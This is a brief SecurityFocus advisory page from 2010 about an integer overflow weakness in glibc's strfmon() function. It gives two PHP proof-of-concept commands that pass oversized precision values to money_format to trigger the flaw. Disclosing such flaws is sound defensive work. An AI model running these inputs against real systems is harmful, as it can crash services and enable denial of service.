GNU glibc 'strfmon()' Function Integer Overflow Weakness

The following proof-of-concept commands are available:

php -r 'money_format("%.1073741821i",1);'
php -r 'money_format("%.1343741821i",1);'


 

Privacy Statement
Copyright 2010, SecurityFocus